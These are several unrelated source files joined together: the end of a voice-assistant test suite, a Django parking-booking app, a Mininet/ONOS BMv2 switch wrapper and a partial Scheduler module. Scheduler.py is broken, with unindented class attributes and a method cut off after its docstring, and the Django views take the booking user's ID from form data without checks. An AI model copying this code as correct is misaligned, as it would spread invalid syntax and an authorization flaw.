        bus.connected_event.wait(10)
        self.assertTrue(bus.connected_event.is_set())
        bus.close()

    def test_speech_module(self):
        """STT on a known WAV file yields a transcript containing 'stop'."""
        context = {"client": "tester",
                   "ident": str(round(time())),
                   "user": "TestRunner"}
        stt_resp = self.bus.wait_for_response(Message("neon.get_stt",
                                                      {"audio_file": os.path.join(AUDIO_FILE_PATH, "stop.wav")},
                                                      context), context["ident"])
        self.assertEqual(stt_resp.context, context)
        self.assertIsInstance(stt_resp.data.get("parser_data"), dict)
        self.assertIsInstance(stt_resp.data.get("transcripts"), list)
        self.assertIn("stop", stt_resp.data.get("transcripts"))

    def test_audio_module(self):
        """TTS returns exactly one synthesized response echoing the input text."""
        text = "This is a test"
        context = {"client": "tester",
                   "ident": str(time()),
                   "user": "TestRunner"}
        tts_resp = self.bus.wait_for_response(Message("neon.get_tts", {"text": text}, context),
                                              context["ident"], timeout=60)
        self.assertEqual(tts_resp.context, context)
        responses = tts_resp.data
        self.assertIsInstance(responses, dict)
        self.assertEqual(len(responses), 1)
        resp = list(responses.values())[0]
        self.assertIsInstance(resp, dict)
        self.assertEqual(resp.get("sentence"), text)

    # TODO: Define some generic enclosure events to test
    # def test_enclosure_module(self):
    #     resp = self.bus.wait_for_response(Message("mycroft.volume.get"))
    #     self.assertIsInstance(resp, Message)
    #     vol = resp.data.get("percent")
    #     mute = resp.data.get("muted")
    #
    #     self.assertIsInstance(vol, float)
    #     self.assertIsInstance(mute, bool)

    # TODO: Implement transcribe tests when transcribe module is updated
    # def test_transcribe_module(self):
    #     resp = self.bus.wait_for_response(Message("get_transcripts"))
    #     self.assertIsInstance(resp, Message)
    #     matches = resp.data.get("transcripts")
    #     self.assertIsInstance(matches, list)

    def test_client_module(self):
        """Brand update requests get a success/failure response from the server."""
        resp = self.bus.wait_for_response(Message("neon.client.update_brands"), "neon.server.update_brands.response")
        self.assertIsInstance(resp, Message)
        data = resp.data
        self.assertIsInstance(data["success"], bool)

    def test_skills_module(self):
        """The skill manager reports its loaded skills as a dict."""
        response = self.bus.wait_for_response(Message("skillmanager.list"), "mycroft.skills.list")
        self.assertIsInstance(response, Message)
        loaded_skills = response.data
        self.assertIsInstance(loaded_skills, dict)

    # TODO: Test user utterance -> response
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
|
views.py | from django.shortcuts import render,redirect
from django.http import HttpResponse
from .models import ParkingInfo,ParkingSpot
from datetime import datetime,timedelta
from django.contrib.auth.models import User,auth
from django.contrib import messages
from django.utils import timezone
from django.utils.timezone import make_aware
from django.core.mail import send_mail
import threading
import time
from django.conf import settings
# Create your views here.
def index(request):
    """Landing page: show total / vacant / booked parking-spot counts."""
    total = ParkingSpot.objects.all().count()
    vacant = ParkingSpot.objects.filter(isoccupied=False).count()
    context = {'total': total, 'vacant': vacant, 'booked': total - vacant}
    return render(request, 'index.html', context)
def home(request):
    """Dashboard: active booking details if one exists, otherwise the booking page."""
    user = request.user
    active = ParkingInfo.objects.filter(userid=user.id, isactive=True)
    if active.exists():
        booking = active[0]
        return render(request, 'parkinginfo.html', {
            'vehicleid': booking.vehicleid,
            'slotid': booking.slotid.id,
            'stime': booking.stime,
            'etime': booking.etime,
        })
    # No active booking: list free spots plus currently occupied ones.
    freespots = ParkingSpot.objects.filter(isoccupied=False)
    occupiedspots = ParkingInfo.objects.filter(isactive=True)
    return render(request, 'home.html', {'freespots': freespots, 'occupiedspots': occupiedspots})
def book(request):
    """Reserve a parking spot for the posting user for a number of hours."""
    if request.method=='POST':
        # Mark the chosen spot as occupied.
        slotid=request.POST['slotid']
        slot=ParkingSpot.objects.get(id=slotid)
        slot.isoccupied=True
        slot.save()
        uid= request.POST['userid']
        userid=User.objects.get(id=uid)
        hourss=int(request.POST['hours'])
        dateobj=make_aware(datetime.now()) + timedelta(minutes=5) #parking overhead
        etimeobj=dateobj+timedelta(hours=hourss)
        print(dateobj)
        print(etimeobj)
        #finaltime=dateobj.strftime("%d/%m/%Y %H:%M:%S")
        vehicleid= request.POST['vehicleid']
        # notifid=0 means no expiry notification has been sent yet.
        details=ParkingInfo(userid=userid,slotid=slot,stime=dateobj,etime=etimeobj,vehicleid=vehicleid,isactive=True,notifid=0)
        details.save()
        return redirect('home')
    else:
        # Non-POST access just bounces back to the dashboard.
        return redirect('home')
def vacate(request):
    """Release a parking spot and close out its active booking record."""
    if request.method=='POST':
        uid =request.user
        slotid=request.POST['slotid']
        print(slotid)
        # Free the spot itself.
        undoslot=ParkingSpot.objects.get(id=slotid)
        undoslot.isoccupied=False
        undoslot.save()
        # Close the booking; record the actual end time (+5 min overhead).
        undoinfo=ParkingInfo.objects.get(slotid=undoslot,isactive=True)
        undoinfo.isactive=False
        undoinfo.etime=make_aware(datetime.now())+timedelta(minutes=5)
        undoinfo.save()
        return redirect('home')
    else:
        return redirect('home')
def parkhistory(request):
    """Show the logged-in user's booking history, newest first."""
    records = ParkingInfo.objects.filter(userid=request.user).order_by('-id')
    return render(request, 'uhistory.html', {'histry': records})
def update(request):
    """Let the logged-in user change their account e-mail address."""
    if request.method == 'POST':
        uid = request.user
        # FIX: the original read request.POST['email1'] and then tested
        # `email is None`. A missing field raises MultiValueDictKeyError and
        # a blank submission is '' (not None), so the check could never fire.
        email = request.POST.get('email1')
        if not email:
            messages.info(request, 'email field cannot be empty...')
            return redirect('update')
        match = User.objects.filter(email=email)
        if uid.email == email:
            # Same address as before: nothing to do.
            messages.info(request, 'email is same')
            return redirect('update')
        elif match.exists():
            # Address already belongs to another account.
            messages.info(request, 'email taken')
            return redirect('update')
        else:
            updating = User.objects.get(id=uid.id)
            updating.email = email
            updating.save()
            messages.info(request, 'contact details were updated successfully...')
            return redirect('home')
    else:
        return render(request, 'conupdt.html')
def extendtime(request):
    """Extend an active booking's end time by the requested number of hours."""
    if request.method=='POST':
        uid =request.user
        slotid=request.POST['slotid']
        hourss=int(request.POST['hours'])
        print(slotid)
        extndslot=ParkingSpot.objects.get(id=slotid)
        # notifid=0: only bookings that have not yet been notified can extend.
        exinfo=ParkingInfo.objects.get(slotid=extndslot,isactive=True,notifid=0)
        exinfo.etime+=timedelta(hours=hourss)
        exinfo.save()
        messages.info(request,'Time extension accepted.')
        return redirect('home')
    else:
        return redirect('home')
def notifyadmin(sid):
    """E-mail the admin that spot *sid* was not vacated. Returns 0 on success, 1 on failure."""
    subject ='Regarding Parking spot vacation'
    msg= f'User did not vacate spot : {sid} even though duration ended and user was notified. Kindly take appropriate decision.'
    to ='iit2019176@iiita.ac.in'
    # send_mail returns the number of messages delivered.
    delivered = send_mail(subject, msg, settings.EMAIL_HOST_USER, [to])
    if delivered == 1:
        print('eMail success')
        return 0
    print('eMail failure')
    return 1
def notifyuser(emailid):
    """E-mail *emailid* that their parking time is up. Returns 0 on success, 1 on failure."""
    subject ='Vacate Parking Spot'
    msg= 'Times up! Kindly vacate the parking Spot or Request extension'
    # send_mail returns the number of messages delivered.
    delivered = send_mail(subject, msg, settings.EMAIL_HOST_USER, [emailid])
    if delivered == 1:
        print('eMail success')
        return 0
    print('eMail failure')
    return 1
def checkin():
    """Scan active bookings and send expiry notifications.

    Warns the user once when less than 10 minutes remain (notifid 0 -> 1),
    and escalates to the admin once when the spot is still occupied more
    than 5 minutes past the booked end time (notifid 1 -> 2).
    """
    infolists = ParkingInfo.objects.filter(isactive=True)
    now = make_aware(datetime.now())
    for info in infolists:
        # Minutes remaining until the booked end time (negative when overdue).
        remaining = (info.etime - now).total_seconds() / 60.0
        if 0 < remaining < 10 and info.notifid == 0:
            # Under 10 minutes left: warn the user.
            if notifyuser(info.userid.email) == 0:
                # FIX: the original re-fetched via
                # ParkingInfo.objects.get(userid=...) without an isactive
                # filter, which can raise MultipleObjectsReturned (or update
                # the wrong row) for users with booking history. We already
                # hold the right record.
                info.notifid = 1
                info.save()
        elif remaining < -5 and info.notifid == 1:
            # More than 5 minutes overdue after a warning: inform the admin.
            # (Original condition `tdiff < 0 and tdiff < -5` simplified; the
            # first clause was redundant.)
            if notifyadmin(info.slotid.id) == 0:
                info.notifid = 2
                info.save()
def checker():
    # Background loop: run an expiry scan every 5 minutes, forever.
    while True:
        checkin()
        time.sleep(300)
#obj=ParkingInfo.objects.filter(isactive=True)
#print(obj)
threading.Thread(target=checker,daemon=True).start() #just one extra thread to handle scheduled checkup of expiry timings
bmv2.py | # coding=utf-8
"""
Copyright 2019-present Open Networking Foundation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import json
import multiprocessing
import os
import random
import re
import socket
import sys
import threading
import time
import urllib2
from contextlib import closing
from mininet.log import info, warn, debug
from mininet.node import Switch, Host
SIMPLE_SWITCH_GRPC = 'simple_switch_grpc'
PKT_BYTES_TO_DUMP = 80
VALGRIND_PREFIX = 'valgrind --leak-check=yes'
SWITCH_START_TIMEOUT = 10 # seconds
BMV2_LOG_LINES = 5
BMV2_DEFAULT_DEVICE_ID = 1
DEFAULT_PIPECONF = "org.onosproject.pipelines.basic"
# Stratum paths relative to stratum repo root
STRATUM_BMV2 = 'stratum_bmv2'
STRATUM_BINARY = '/bazel-bin/stratum/hal/bin/bmv2/' + STRATUM_BMV2
STRATUM_INIT_PIPELINE = '/stratum/hal/bin/bmv2/dummy.json'
def getStratumRoot():
    """Return the Stratum source-tree root from the STRATUM_ROOT env variable."""
    root = os.environ.get('STRATUM_ROOT')
    if root is None:
        raise Exception("Env variable STRATUM_ROOT not set")
    return root
def parseBoolean(value):
    """Interpret CLI/netcfg flag values: '1', 1, 'true' and 'True' are truthy."""
    return value in ('1', 1, 'true', 'True')
def pickUnusedPort():
    """Bind an ephemeral TCP port on localhost and return its number.

    Note: the port is released before returning, so it is only *likely*
    still free when the caller uses it.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.bind(('localhost', 0))
        return sock.getsockname()[1]
    finally:
        sock.close()
def writeToFile(path, value):
    """Overwrite *path* with str(value)."""
    with open(path, "w") as out:
        out.write(str(value))
def watchDog(sw):
    # Runs in a background thread: polls the switch's gRPC port once a second
    # and restarts the switch if it stops answering. Removing the keepalive
    # file (or a Mininet-level exception) terminates the switch instead.
    try:
        writeToFile(sw.keepaliveFile,
                    "Remove this file to terminate %s" % sw.name)
        while True:
            if ONOSBmv2Switch.mininet_exception == 1 \
                    or not os.path.isfile(sw.keepaliveFile):
                sw.killBmv2(log=False)
                return
            if sw.stopped:
                # stop() was called deliberately; nothing to babysit.
                return
            with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
                # Stratum exposes an internal gRPC port; plain BMv2 only the
                # external one.
                port = sw.grpcPortInternal if sw.grpcPortInternal else sw.grpcPort
                if s.connect_ex(('localhost', port)) == 0:
                    time.sleep(1)
                else:
                    warn("\n*** WARN: switch %s crashed ☠️, restarting... \n"
                         % sw.name)
                    sw.stop()
                    sw.start()
                    return
    except Exception as e:
        # NOTE: `e.message` is Python 2 only, consistent with the rest of
        # this module (print statements, urllib2).
        warn("*** ERROR: " + e.message)
        sw.killBmv2(log=True)
class ONOSHost(Host):
    """Mininet host with NIC offloads and IPv6 disabled for BMv2 use."""

    def __init__(self, name, inNamespace=True, **params):
        Host.__init__(self, name, inNamespace=inNamespace, **params)

    def config(self, **params):
        # NOTE(review): `super(Host, self)` skips Host.config and calls the
        # grandparent's — looks intentional in the original but worth
        # confirming (`super(ONOSHost, self)` would be the usual form).
        r = super(Host, self).config(**params)
        # Turn off RX/TX checksum and scatter-gather offloads so packets
        # reach the software switch unmodified.
        for off in ["rx", "tx", "sg"]:
            cmd = "/sbin/ethtool --offload %s %s off" \
                  % (self.defaultIntf(), off)
            self.cmd(cmd)
        # disable IPv6
        self.cmd("sysctl -w net.ipv6.conf.all.disable_ipv6=1")
        self.cmd("sysctl -w net.ipv6.conf.default.disable_ipv6=1")
        self.cmd("sysctl -w net.ipv6.conf.lo.disable_ipv6=1")
        return r
class ONOSBmv2Switch(Switch):
    """BMv2 software switch with gRPC server"""
    # Shared value used to notify to all instances of this class that a Mininet
    # exception occurred. Mininet exception handling doesn't call the stop()
    # method, so the mn process would hang after clean-up since Bmv2 would still
    # be running.
    mininet_exception = multiprocessing.Value('i', 0)

    def __init__(self, name, json=None, debugger=False, loglevel="warn",
                 elogger=False, grpcport=None, cpuport=255, notifications=False,
                 thriftport=None, netcfg=False, dryrun=False,
                 pipeconf=DEFAULT_PIPECONF, pktdump=False, valgrind=False,
                 gnmi=False, portcfg=True, onosdevid=None, stratum=False,
                 **kwargs):
        Switch.__init__(self, name, **kwargs)
        self.grpcPort = grpcport
        self.grpcPortInternal = None  # Needed for Stratum (local_hercules_url)
        self.thriftPort = thriftport
        self.cpuPort = cpuport
        self.json = json
        self.useStratum = parseBoolean(stratum)
        self.debugger = parseBoolean(debugger)
        self.notifications = parseBoolean(notifications)
        self.loglevel = loglevel
        # Important: Mininet removes all /tmp/*.log files in case of exceptions.
        # We want to be able to see the bmv2 log if anything goes wrong, hence
        # avoid the .log extension.
        self.logfile = '/tmp/bmv2-%s-log' % self.name
        self.elogger = parseBoolean(elogger)
        self.pktdump = parseBoolean(pktdump)
        self.netcfg = parseBoolean(netcfg)
        self.dryrun = parseBoolean(dryrun)
        self.valgrind = parseBoolean(valgrind)
        self.netcfgfile = '/tmp/bmv2-%s-netcfg.json' % self.name
        self.chassisConfigFile = '/tmp/bmv2-%s-chassis-config.txt' % self.name
        self.pipeconfId = pipeconf
        self.injectPorts = parseBoolean(portcfg)
        self.withGnmi = parseBoolean(gnmi)
        self.longitude = kwargs['longitude'] if 'longitude' in kwargs else None
        self.latitude = kwargs['latitude'] if 'latitude' in kwargs else None
        if onosdevid is not None and len(onosdevid) > 0:
            self.onosDeviceId = onosdevid
        else:
            self.onosDeviceId = "device:bmv2:%s" % self.name
        self.p4DeviceId = BMV2_DEFAULT_DEVICE_ID
        self.logfd = None
        self.bmv2popen = None
        self.stopped = True
        # In case of exceptions, mininet removes *.out files from /tmp. We use
        # this as a signal to terminate the switch instance (if active).
        self.keepaliveFile = '/tmp/bmv2-%s-watchdog.out' % self.name
        self.targetName = STRATUM_BMV2 if self.useStratum else SIMPLE_SWITCH_GRPC
        self.controllers = None
        # Remove files from previous executions
        self.cleanupTmpFiles()

    def getSourceIp(self, dstIP):
        """
        Queries the Linux routing table to get the source IP that can talk with
        dstIP, and vice versa.
        """
        ipRouteOut = self.cmd('ip route get %s' % dstIP)
        r = re.search(r"src (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})", ipRouteOut)
        return r.group(1) if r else None

    def getDeviceConfig(self, srcIP):
        # Build the ONOS "basic" device config (plus port descriptions for
        # plain BMv2; Stratum discovers ports itself).
        basicCfg = {
            "managementAddress": "grpc://%s:%d?device_id=%d" % (
                srcIP, self.grpcPort, self.p4DeviceId),
            "driver": "stratum-bmv2" if self.useStratum else "bmv2",
            "pipeconf": self.pipeconfId
        }
        if self.longitude and self.latitude:
            basicCfg["longitude"] = self.longitude
            basicCfg["latitude"] = self.latitude
        cfgData = {
            "basic": basicCfg
        }
        if not self.useStratum and self.injectPorts:
            portData = {}
            portId = 1
            for intfName in self.intfNames():
                if intfName == 'lo':
                    continue
                portData[str(portId)] = {
                    "number": portId,
                    "name": intfName,
                    "enabled": True,
                    "removed": False,
                    "type": "copper",
                    "speed": 10000
                }
                portId += 1
            cfgData['ports'] = portData
        return cfgData

    def chassisConfig(self):
        # Render the Stratum chassis config (proto text) for this switch,
        # with one singleton_port entry per data-plane interface.
        config = """description: "BMv2 simple_switch {name}"
chassis {{
  platform: PLT_P4_SOFT_SWITCH
  name: "{name}"
}}
nodes {{
  id: {nodeId}
  name: "{name} node {nodeId}"
  slot: 1
  index: 1
}}\n""".format(name=self.name, nodeId=self.p4DeviceId)

        intfNumber = 1
        for intfName in self.intfNames():
            if intfName == 'lo':
                continue
            config = config + """singleton_ports {{
  id: {intfNumber}
  name: "{intfName}"
  slot: 1
  port: {intfNumber}
  channel: 1
  speed_bps: 10000000000
  config_params {{
    admin_state: ADMIN_STATE_ENABLED
  }}
  node: {nodeId}
}}\n""".format(intfName=intfName, intfNumber=intfNumber,
               nodeId=self.p4DeviceId)
            intfNumber += 1

        return config

    def doOnosNetcfg(self, controllerIP):
        """
        Notifies ONOS about the new device via Netcfg.
        """
        srcIP = self.getSourceIp(controllerIP)
        if not srcIP:
            warn("*** WARN: unable to get switch IP address, won't do netcfg\n")
            return

        cfgData = {
            "devices": {
                self.onosDeviceId: self.getDeviceConfig(srcIP)
            }
        }
        with open(self.netcfgfile, 'w') as fp:
            json.dump(cfgData, fp, indent=4)

        if not self.netcfg:
            # Do not push config to ONOS.
            print ""
            return

        # Build netcfg URL
        url = 'http://%s:8181/onos/v1/network/configuration/' % controllerIP
        # Instantiate password manager for HTTP auth
        pm = urllib2.HTTPPasswordMgrWithDefaultRealm()
        pm.add_password(None, url,
                        os.environ['ONOS_WEB_USER'],
                        os.environ['ONOS_WEB_PASS'])
        urllib2.install_opener(urllib2.build_opener(
            urllib2.HTTPBasicAuthHandler(pm)))
        # Push config data to controller
        req = urllib2.Request(url, json.dumps(cfgData),
                              {'Content-Type': 'application/json'})
        try:
            f = urllib2.urlopen(req)
            print f.read()
            f.close()
        except urllib2.URLError as e:
            warn("*** WARN: unable to push config to ONOS (%s)\n" % e.reason)

    def start(self, controllers=None):
        # Start BMv2 (or Stratum), wait until its gRPC port answers, then
        # spawn the watchdog and notify ONOS via netcfg.
        if not self.stopped:
            warn("*** %s is already running!\n" % self.name)
            return
        if controllers is not None:
            # If restarting after crash use same controllers as for first
            # start.
            self.controllers = controllers

        # Remove files from previous executions (if we are restarting)
        self.cleanupTmpFiles()

        if self.grpcPort is None:
            self.grpcPort = pickUnusedPort()
        writeToFile("/tmp/bmv2-%s-grpc-port" % self.name, self.grpcPort)
        if self.thriftPort is None:
            self.thriftPort = pickUnusedPort()
        writeToFile("/tmp/bmv2-%s-thrift-port" % self.name, self.thriftPort)

        if self.useStratum:
            config_dir = "/tmp/bmv2-%s-stratum" % self.name
            os.mkdir(config_dir)
            with open(self.chassisConfigFile, 'w') as fp:
                fp.write(self.chassisConfig())
            if self.grpcPortInternal is None:
                self.grpcPortInternal = pickUnusedPort()
            cmdString = self.getStratumCmdString(config_dir)
        else:
            cmdString = self.getBmv2CmdString()

        if self.dryrun:
            info("\n*** DRY RUN (not executing %s)\n" % self.targetName)

        debug("\n%s\n" % cmdString)

        try:
            if not self.dryrun:
                # Start the switch
                self.stopped = False
                self.logfd = open(self.logfile, "w")
                self.logfd.write(cmdString + "\n\n" + "-" * 80 + "\n\n")
                self.logfd.flush()
                self.bmv2popen = self.popen(cmdString,
                                            stdout=self.logfd,
                                            stderr=self.logfd)
                self.waitBmv2Start()
                # We want to be notified if BMv2/Stratum dies...
                threading.Thread(target=watchDog, args=[self]).start()

            self.doOnosNetcfg(self.controllerIp(self.controllers))
        except Exception:
            ONOSBmv2Switch.mininet_exception = 1
            self.killBmv2()
            self.printBmv2Log()
            raise

    def getBmv2CmdString(self):
        # Full simple_switch_grpc command line (optionally under valgrind).
        bmv2Args = [SIMPLE_SWITCH_GRPC] + self.bmv2Args()
        if self.valgrind:
            bmv2Args = VALGRIND_PREFIX.split() + bmv2Args
        return " ".join(bmv2Args)

    def getStratumCmdString(self, config_dir):
        # Full stratum_bmv2 command line.
        stratumRoot = getStratumRoot()
        args = [
            stratumRoot + STRATUM_BINARY,
            '-device_id=%d' % self.p4DeviceId,
            '-chassis_config_file=%s' % self.chassisConfigFile,
            '-forwarding_pipeline_configs_file=/dev/null',
            '-persistent_config_dir=' + config_dir,
            '-initial_pipeline=' + stratumRoot + STRATUM_INIT_PIPELINE,
            '-cpu_port=%s' % self.cpuPort,
            '-external_hercules_urls=0.0.0.0:%d' % self.grpcPort,
            '-local_hercules_url=localhost:%d' % self.grpcPortInternal,
            '-bmv2_thrift_port=%d' % self.thriftPort,
            '-bmv2_log_level=%s' % self.loglevel,
            '-max_num_controllers_per_node=10',
            '-write_req_log_file=/dev/null'
        ]
        return " ".join(args)

    def bmv2Args(self):
        # simple_switch_grpc argument list; everything after '--' is for the
        # gRPC target.
        args = ['--device-id %s' % str(self.p4DeviceId)]
        for port, intf in self.intfs.items():
            if not intf.IP():
                args.append('-i %d@%s' % (port, intf.name))
        args.append('--thrift-port %s' % self.thriftPort)
        if self.notifications:
            ntfaddr = 'ipc:///tmp/bmv2-%s-notifications.ipc' % self.name
            args.append('--notifications-addr %s' % ntfaddr)
        if self.elogger:
            nanologaddr = 'ipc:///tmp/bmv2-%s-nanolog.ipc' % self.name
            args.append('--nanolog %s' % nanologaddr)
        if self.debugger:
            dbgaddr = 'ipc:///tmp/bmv2-%s-debug.ipc' % self.name
            args.append('--debugger-addr %s' % dbgaddr)
        args.append('--log-console')
        if self.pktdump:
            args.append('--pcap --dump-packet-data %s' % PKT_BYTES_TO_DUMP)
        args.append('-L%s' % self.loglevel)
        if not self.json:
            args.append('--no-p4')
        else:
            args.append(self.json)
        # gRPC target-specific options
        args.append('--')
        args.append('--cpu-port %s' % self.cpuPort)
        args.append('--grpc-server-addr 0.0.0.0:%s' % self.grpcPort)
        return args

    def waitBmv2Start(self):
        # Wait for switch to open gRPC port, before sending ONOS the netcfg.
        # Include time-out just in case something hangs.
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        endtime = time.time() + SWITCH_START_TIMEOUT
        while True:
            port = self.grpcPortInternal if self.grpcPortInternal else self.grpcPort
            result = sock.connect_ex(('localhost', port))
            if result == 0:
                # No new line
                sys.stdout.write("⚡️ %s @ %d" % (self.targetName, self.bmv2popen.pid))
                sys.stdout.flush()
                # The port is open. Let's go! (Close socket first)
                sock.close()
                break
            # Port is not open yet. If there is time, we wait a bit.
            if endtime > time.time():
                sys.stdout.write('.')
                sys.stdout.flush()
                time.sleep(0.05)
            else:
                # Time's up.
                raise Exception("Switch did not start before timeout")

    def printBmv2Log(self):
        # Dump the last BMV2_LOG_LINES lines of the switch log to stdout.
        if os.path.isfile(self.logfile):
            print "-" * 80
            print "%s log (from %s):" % (self.name, self.logfile)
            with open(self.logfile, 'r') as f:
                lines = f.readlines()
                if len(lines) > BMV2_LOG_LINES:
                    print "..."
                for line in lines[-BMV2_LOG_LINES:]:
                    print line.rstrip()

    @staticmethod
    def controllerIp(controllers):
        # Pick a random controller IP (handles both onos.py clusters and
        # plain controller lists).
        try:
            # onos.py
            clist = controllers[0].nodes()
        except AttributeError:
            clist = controllers
        assert len(clist) > 0
        return random.choice(clist).IP()

    def killBmv2(self, log=False):
        # Terminate the switch process and close its log file.
        self.stopped = True
        if self.bmv2popen is not None:
            self.bmv2popen.terminate()
            self.bmv2popen.wait()
            self.bmv2popen = None
        if self.logfd is not None:
            if log:
                self.logfd.write("*** PROCESS TERMINATED BY MININET ***\n")
            self.logfd.close()
            self.logfd = None

    def cleanupTmpFiles(self):
        # Remove all per-switch state files from previous runs.
        self.cmd("rm -rf /tmp/bmv2-%s-*" % self.name)

    def stop(self, deleteIntfs=True):
        """Terminate switch."""
        self.killBmv2(log=True)
        Switch.stop(self, deleteIntfs)
class ONOSStratumSwitch(ONOSBmv2Switch):
    """ONOSBmv2Switch variant that always runs the Stratum agent."""

    def __init__(self, name, **kwargs):
        # Force Stratum mode regardless of any caller-supplied flag.
        kwargs["stratum"] = True
        super(ONOSStratumSwitch, self).__init__(name, **kwargs)
# Exports for bin/mn
# These dicts register the custom node classes so Mininet's CLI can select
# them with --switch / --host.
switches = {
    'onosbmv2': ONOSBmv2Switch,
    'stratum': ONOSStratumSwitch,
}
hosts = {'onoshost': ONOSHost}
|
Scheduler.py | import datetime
import time
from multiprocessing import Process
import json
from src.application_management.CompletenessConstraint import CompletenessConstraint
from src.application_management.StaticTimeout import StaticTimeout
from src.application_management.Publisher import Publisher
# invoked when a process times out, associated with an individual packet arrival
# requirement is a static timeout or constraint
def onTimeout(requirement, timeout, updater, publisher, network_monitor, below_constraint = None):
    """Sleep for *timeout* seconds, then dispatch a timeout/violation callback.

    Runs as the body of a dedicated Process. *requirement* is either a
    CompletenessConstraint or a StaticTimeout; the callback goes to the
    requirement's remote object (via *updater*) when one exists, otherwise
    to *publisher*.
    """
    time.sleep(float(timeout))
    # ISO timestamp of the moment the timeout fired; the json round-trip and
    # strip remove the surrounding quotes.
    timestamp = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f')
    timestamp = json.dumps(timestamp, indent=4, sort_keys=True)
    timestamp = timestamp.strip('"')
    # Ask the network monitor for the completeness achieved at timeout time.
    if (isinstance(requirement, CompletenessConstraint)):
        completeness = network_monitor.notifyTimeoutForConstraint(requirement.getDeviceKey(), requirement.getCompleteness().rstrip()).text
        print('timeout completeness:' + completeness)
    else:
        completeness = network_monitor.notifyTimeoutForStaticTimeout(requirement.getDeviceKey(), requirement.getTimeout()).text
        print('timeout completeness:' + completeness)
    # If a below-constraint completeness estimate is available, decide between
    # a violation callback and a plain timeout callback.
    if below_constraint != None and below_constraint[requirement.getCompleteness()] != None:
        if below_constraint[requirement.getCompleteness().rstrip()] < requirement.getThreshold():
            if requirement.getRemoteObject() != None:
                print(datetime.datetime.now(), '| [Scheduler]:',
                      'Violation occurred prior packet arrival. Invoking onTimeout().')
                updater.onViolation(requirement.getRemoteObject(), completeness.rstrip(), timeout, timestamp)
            else:
                print(datetime.datetime.now(), '| [Scheduler]:',
                      'Violation occurred prior packet arrival. Invoking onViolationt() on Publisher.')
                publisher.onViolation(requirement.getID(), requirement.getDeviceKey(), None, completeness.rstrip(), timeout, timestamp)
        else:
            if requirement.getRemoteObject() != None:
                print(datetime.datetime.now(), '| [Scheduler]:',
                      'Timeout occurred prior packet arrival. Invoking onTimeout() on Updater.')
                updater.onTimeout(requirement.getRemoteObject(), completeness.rstrip(), timeout, timestamp)
            else:
                print(datetime.datetime.now(), '| [Scheduler]:',
                      'Timeout occurred prior packet arrival. Invoking onTimeout() on Publisher.')
                publisher.onTimeout(requirement.getID(), requirement.getDeviceKey(), completeness.rstrip(), timeout, timestamp)
    else:
        # No completeness estimate: report a plain timeout.
        if requirement.getRemoteObject() != None:
            updater.onTimeout(requirement.getRemoteObject(), completeness.rstrip(), timeout, timestamp)
        else:
            publisher.onTimeout(requirement.getID(), requirement.getDeviceKey(), completeness.rstrip(), timeout, timestamp)
# Responsible for coordinating callback methods of (remote) application objects,
# based on packet arrival times and timeouts.
class Scheduler:
# used for unique IDs of ApplicationConstraint objects.
# both an ApplicationConstraint and the corresponding Process share the same ID.
constraint_counter = 0
# used for unique IDs of StaticTimeout objects.
# both a StaticTimeout and the corresponding Process share the same ID.
static_timeout_counter = 0
    def __init__(self, updater, publisher, data_parser, network_monitor):
        """Wire the scheduler to its collaborators and initialise bookkeeping."""
        self.updater = updater
        self.publisher = publisher
        self.data_parser = data_parser
        self.data_parser.setScheduler(self)
        self.network_monitor = network_monitor
        # registered CompletenessConstraint objects
        self.constraints = []
        # ApplicationConstraint.id : process
        self.constraint_to_process = dict()
        # static timeouts
        self.timeouts = []
        # StaticTimeout.id : process
        self.timeout_to_process = dict()
        # used to determine ID of registered constraints / static timeouts.
        self.registration_id = 0
    def getUpdater(self):
        """Return the Updater used for remote-object callbacks."""
        return self.updater
    def getDataParser(self):
        """Return the data parser wired to this scheduler."""
        return self.data_parser
    # register completeness constraint for device key
    # returns unique ID to identify websocket notifications for this registration
    def registerCompleteness(self, device, pid1, pid2, measurement, completeness_constraint, threshold, remote_object=None):
        """Register a completeness constraint for a device stream; returns its registration ID."""
        constraint = CompletenessConstraint(self.registration_id, pid1, pid2, device, measurement, completeness_constraint, threshold, remote_object)
        self.constraints.append(constraint)
        self.constraint_to_process[self.registration_id] = None
        # stream key format: "<pid1>/<pid2>:<device>|<measurement>"
        key = pid1 + '/' + pid2 + ':' + device + '|' + measurement
        self.network_monitor.trackCompletenessConstraintForStream(key, completeness_constraint)
        self.network_monitor.activateDataSource(key)
        #self.constraint_counter += 1
        self.registration_id +=1
        return self.registration_id - 1
    # register static timeout for device key
    # returns unique ID to identify websocket notifications for this registration
    def registerTimeOut(self, device, pid1, pid2, measurement, timeout, remote_object=None):
        """Register a static timeout for a device stream; returns its registration ID."""
        static_timeout = StaticTimeout(self.registration_id, pid1, pid2, device, measurement, timeout, remote_object)
        # stream key format: "<pid1>/<pid2>:<device>|<measurement>"
        key = pid1 + '/' + pid2 + ':' + device + '|' + measurement
        self.timeouts.append(static_timeout)
        self.timeout_to_process[self.registration_id] = None
        self.network_monitor.trackStaticTimeoutForStream(key, timeout)
        self.network_monitor.activateDataSource(key)
        #self.static_timeout_counter += 1
        self.registration_id +=1
        return self.registration_id - 1
    # When a timeout has occured, the scheduler waits for the next packet
    # arrival before restarting a new timeout process.
    def receiveData(self, arrival_time, time_generated, key, value, next_timeout, achieved_completeness_constraints, above_constraint, achieved_completeness_timeouts, timestamp):
        """Handle one packet arrival for the stream identified by ``key``.

        For every registered completeness constraint and static timeout whose
        stream key matches, this cancels any still-running timeout process,
        notifies the Updater (when a remote object was registered) or the
        Publisher (otherwise), and then starts a fresh timeout Process.

        NOTE(review): ``next_timeout``, ``achieved_completeness_constraints``
        and ``above_constraint`` appear to be mappings keyed by a constraint's
        completeness value, and ``achieved_completeness_timeouts`` by the
        timeout value — confirm against the DataParser that produces them.
        """
